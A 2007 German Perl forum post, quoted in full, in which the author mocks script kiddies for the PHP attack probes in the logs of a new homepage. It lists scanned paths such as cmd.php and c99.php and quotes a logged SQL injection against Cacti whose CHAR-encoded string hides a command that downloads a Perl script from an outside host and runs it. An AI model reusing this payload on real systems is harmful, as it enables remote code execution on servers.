Opened by bloonix at 2007-07-13 02:58
User since
2005-12-17
1615 Artikel
HausmeisterIn
![[Homepage]](/battie/theme/default/homepage.gif)
2005-12-17
1615 Artikel
HausmeisterIn
Ulkig isses... :)
Seit der Veröffentlichung meiner Homepage sind ja nun schon einige
Wochen vergangen und heute habe ich das erste mal einen Blick in die
Datenbank geworfen. Es ist schon seltsam, dass die meisten vermeintlichen
Angriffe immer nur irgendwas mit PHP zu tun haben.
Naja, die Liste zieht sich noch um Meilen weiter. Es sind sogar solche
Schmückerl dabei und auch nicht der Einzigste:
Ich finde es schon erschreckend, dass PHP so eine große Angriffsplattform
ist und leider ja auch nicht unberechtigt. Das ist ein ein weiterer Grund für
mich, weshalb ich nie und nimmer PHP verwenden werde.
Die Skript Kiddies hätten sich zudem die Mühe sparen können, wenn sie
sich einfach nur mal meinen Content angesehen hätten. Jeder weiß doch,
das ein Perler niemals PHP verwendet - meistens - und andersrum eben-
falls - zum Vergleich würde ein Linuxadmin wohl nie eine Windowsbüxe
administrieren oder GwenDragon würde niemals Froschpopo heiraten.
Nein, nein, das verträgt sich einfach nicht. ;)
Sorry, dass mal wieder über PHP gelästert wurde!
Viele Grüße,
opi
Seit der Veröffentlichung meiner Homepage sind ja nun schon einige
Wochen vergangen und heute habe ich das erste mal einen Blick in die
Datenbank geworfen. Es ist schon seltsam, dass die meisten vermeintlichen
Angriffe immer nur irgendwas mit PHP zu tun haben.
Code: (dl
)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
/1-2-3/process.php
/123/process.php
/acp/index.php
/ADMIN/main.php
/ads/adxmlrpc.php
/Ads/adxmlrpc.php
/adxmlrpc.php
/AZenv/azenv.php
/bestellen/index.php
/blogs/xmlrpc.php
/blog/xmlrpc.php
/board/search.php
/c99.phpmain.php
/cacti/cmd.php
/_caupo/index.php
/caupo/index.php
/clan/index.php
/clanpge/index.php
/cmd.php
/cmd.phpmain.php
/cms/index.php
/database/main.php
/datenbank/main.php
/db/admin/main.php
/dbadmin/main.php
/db/dbadmin/main.php
/db/db/main.php
/db/dbweb/main.php
/db/main.php
/db/myadmin/main.php
/db/pma2005/main.php
/db/pMA2005/main.php
/db/pma2006/main.php
/db/pMA2006/main.php
Naja, die Liste zieht sich noch um Meilen weiter. Es sind sogar solche
Schmückerl dabei und auch nicht der Einzigste:
Code: (dl
)
1
2
3
4
5
6
7
/cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,114,109,3
2,45,114,102,32,47,116,109,112,47,100,101,115,107,46,112,108,59,119,103,101,116,32,119,119
,119,46,115,104,97,100,121,46,49,115,116,104,111,115,116,46,111,114,103,4
7,100,101,115,107,46,112,108,32,45,79,32,47,116,109,112,47,100,101,115,107,46,112,108,59,1
12,101,114,108,32,47,116,109,112,47,100,101,115,107,46,112,108,59,114,109
,32,45,114,102,32,47,116,109,112,47,111,117,116,32,62,32,46,47,114,114,97,47,115,117,110,1
16,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111
Ich finde es schon erschreckend, dass PHP so eine große Angriffsplattform
ist und leider ja auch nicht unberechtigt. Das ist ein ein weiterer Grund für
mich, weshalb ich nie und nimmer PHP verwenden werde.
Die Skript Kiddies hätten sich zudem die Mühe sparen können, wenn sie
sich einfach nur mal meinen Content angesehen hätten. Jeder weiß doch,
das ein Perler niemals PHP verwendet - meistens - und andersrum eben-
falls - zum Vergleich würde ein Linuxadmin wohl nie eine Windowsbüxe
administrieren oder GwenDragon würde niemals Froschpopo heiraten.
Nein, nein, das verträgt sich einfach nicht. ;)
Sorry, dass mal wieder über PHP gelästert wurde!
Viele Grüße,
opi
What is a good module? That's hard to say.
What is good code? That's also hard to say.
One man's Thing of Beauty is another's man's Evil Hack.
What is good code? That's also hard to say.
One man's Thing of Beauty is another's man's Evil Hack.